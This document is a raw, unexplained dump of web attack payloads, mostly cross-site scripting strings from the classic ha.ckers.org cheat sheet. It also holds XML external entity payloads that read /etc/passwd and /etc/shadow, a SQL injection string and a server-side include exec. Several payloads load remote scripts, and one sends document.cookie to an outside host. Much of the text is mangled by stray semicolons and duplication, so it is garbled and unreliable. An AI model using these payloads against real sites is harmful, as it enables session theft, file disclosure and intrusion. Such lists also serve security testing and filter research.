PT SRC="securitycompass.com/xss.js">
[Mozilla] "><BODY onload!#$%&()~+-_.,:;?@[/|]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out <~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/-/STYLE=xss:e/**/xpression(window.location="procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "> </XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/-/STYLE=xss:e//xpression(alert('XSS'))> XSS STYLE=xss:e//xpression(alert('XSS'))> ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; ';';;!--";<;XSS>;=&;{()} <;SCRIPT>;alert(';XSS';)<;/SCRIPT>; <;SCRIPT SRC=ha.ckers.org/xss.js>;<;/SCRIPT>; <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; <;BASE HREF=";javascript:alert(';XSS';);//";>; <;BGSOUND SRC=";javascript:alert(';XSS';);";>; <;BODY BACKGROUND=";javascript:alert(';XSS';);";>; <;BODY ONLOAD=alert(';XSS';)>; <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; <;DIV STYLE=";width: expression(alert(';XSS';));";>; <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=javascript:alert(';XSS';)>; <;IMG DYNSRC=";javascript:alert(';XSS';);";>; <;IMG LOWSRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";thesiteyouareon.com/somecommand.php?somevar..";>; Redirect 302 /a.jpg victimsite.com/admin.asp&;deleteuser exp/<;XSS STYLE=';no\xss:noxss(";//";); <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS <;IMG SRC=';vbscript:msgbox(";XSS";)';>; <;LAYER SRC=";ha.ckers.org/scriptlet.html";>;<;/LAYER>; <;IMG SRC=";livescript:[code]";>; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; <;IMG SRC=";mocha:[code]";>; <;OBJECT TYPE=";text/x-scriptlet"; DATA=";ha.ckers.org/scriptlet.html";>;<;/OBJECT>; <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; <;EMBED SRC=";ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d); <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; <;IMG STYLE=";xss:expr/XSS/ession(alert(';XSS';))";>; <;XSS STYLE=";xss:expression(alert(';XSS';))";>; <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; <;LINK REL=";stylesheet"; HREF=";ha.ckers.org/xss.css";>; <;STYLE>;@import';ha.ckers.org/xss.css';;<;/STYLE>; <;META HTTP-EQUIV=";Link"; Content=";;http://ha.ckers.org/xss.css;; REL=stylesheet";>; <;STYLE>;BODY{-moz-binding:url(";ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; <;HTML xmlns:xss>; <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; <;XML SRC=";ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; <;HTML>;<;BODY>; <;!--[if gte IE 4]>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; <;XSS STYLE=";behavior: url(ha.ckers.org/xss.htc);";>; <;SCRIPT SRC=";ha.ckers.org/xss.jpg";>;<;/SCRIPT>; <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; <;? echo(';<;SCR)';; <;BR SIZE=";&;{alert(';XSS';)}";>; <;IMG SRC=JaVaScRiPt:alert(';XSS';)>; <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; <;IMG SRC=javascript:alert(";RSnake says, ';XSS';";)>; <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- \";;alert(';XSS';);// <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; <;IMG SRC=";jav ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; <;IMG SRC = "; j a v a s c r i p t : a l e r t '; X S S '; ) "; >; perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out <;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; <;SCRIPT/XSS SRC=";ha.ckers.org/xss.js";>;<;/SCRIPT>; <;BODY onload!#$%&;()*~+-_.,:;?@[/|]^=alert(";XSS";)>; <;SCRIPT SRC=http://ha.ckers.org/xss.js <;SCRIPT SRC=//ha.ckers.org/.j>; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; <;SCRIPT>;a=/XSS/ <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=>;` SRC=";ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";>';>"; SRC=";ha.ckers.org/xss.js";>;<;/SCRIPT>; <;A HREF=";http://66.102.7.147/";>;XSS<;/A>; <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; <;A HREF=";http://1113982867/";>;XSS<;/A>; <;A HREF=";0x42.0x0000066.0x7.0x93";>;XSS<;/A>; <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; <;A HREF=";h tt p://6&;#09;6.000146.0x7.147";>;XSS<;/A>; <;A HREF=";google.com";>;XSS<;/A>; <;A HREF=";//google";>;XSS<;/A>; <;A HREF=";ha.ckers.org@google";>;XSS<;/A>; <;A HREF=";google:ha.ckers.org";>;XSS<;/A>; <;A HREF=";google.com";>;XSS<;/A>; <;A HREF=";google.com.";>;XSS<;/A>; <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; <;A HREF=";gohttp://www.google.com/ogle.com";>;XSS<;/A>;<
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
\";document.vulnerable=true;;//
- XSS
1script3document.vulnerable=true;1/script3
exp/<A STYLE='no\xss:noxss("//");xss:ex/XSS///*/pression(document.vulnerable=true)'>
<![
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"> <? echo('document.vulnerable=true'); ?>
+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
& &{document.vulnerable=true;};
< <![
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script><?import namespace="xss" implementation="securitycompass.com/xss.htc">XSS
PT SRC="securitycompass.com/xss.js">
[Mozilla] ";>;<;BODY onload!#$%&;()~+-_.,:;?@[/|]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br style=a:expression(alert())>; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert('XSS')}\";>; perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out <~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/-/STYLE=xss:e/**/xpression(window.location="procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "> </XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/-/STYLE=xss:e/*/xpression(alert('XSS'))> XSS STYLE=xss:e//xpression(alert('XSS'))> ">& "> "'> %22%27> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' '';!--"=&{()}")>
#115;cript:alert('XSS')>
#0000118ascript:alert('XSS')>
#x63ript:alert('XSS')>
<![CDATA[]]> <?xml version="1.0" encoding="ISO-8859-1"?><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> <?xml version="1.0" encoding="ISO-8859-1"?><![CDATA[' or 1=1 or ''=']]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]>&xee;
%3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e
">
<IMG SRC="javascript:alert('XSS')"
ipt>alert(1)ipt>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
=(◕_◕)=
- XSS
- XSS
- XSS
- XSS